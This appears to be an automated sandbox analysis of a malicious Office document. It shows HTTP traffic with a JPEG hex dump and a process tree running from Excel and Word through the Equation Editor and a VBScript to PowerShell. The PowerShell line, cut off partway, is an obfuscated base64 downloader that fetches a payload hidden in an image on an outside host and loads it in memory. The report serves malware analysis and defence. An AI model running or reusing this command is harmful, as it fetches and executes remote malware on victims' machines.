                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88ac89f5ca297c96-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-28 07:30:21 UTC670INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                2024-05-28 07:30:21 UTC1369INData Raw: c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc
                                Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                                2024-05-28 07:30:21 UTC1369INData Raw: c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24
                                Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$
                                2024-05-28 07:30:21 UTC1369INData Raw: 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01
                                Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
                                2024-05-28 07:30:21 UTC1369INData Raw: 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e
                                Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^
                                2024-05-28 07:30:21 UTC1369INData Raw: cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1
                                Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
                                2024-05-28 07:30:21 UTC1369INData Raw: 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3
                                Data Ascii: r:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
                                2024-05-28 07:30:21 UTC1369INData Raw: dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae
                                Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
                                2024-05-28 07:30:21 UTC1369INData Raw: 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce
                                Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
                                2024-05-28 07:30:21 UTC1369INData Raw: f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8
                                Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:1
                                Start time:03:29:35
                                Start date:28/05/2024
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x13f0e0000
                                File size:28'253'536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:4
                                Start time:03:29:59
                                Start date:28/05/2024
                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                Imagebase:0x13f750000
                                File size:1'423'704 bytes
                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:8
                                Start time:03:30:08
                                Start date:28/05/2024
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                Imagebase:0x400000
                                File size:543'304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:03:30:10
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs"
                                Imagebase:0xad0000
                                File size:141'824 bytes
                                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:10
                                Start time:03:30:13
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE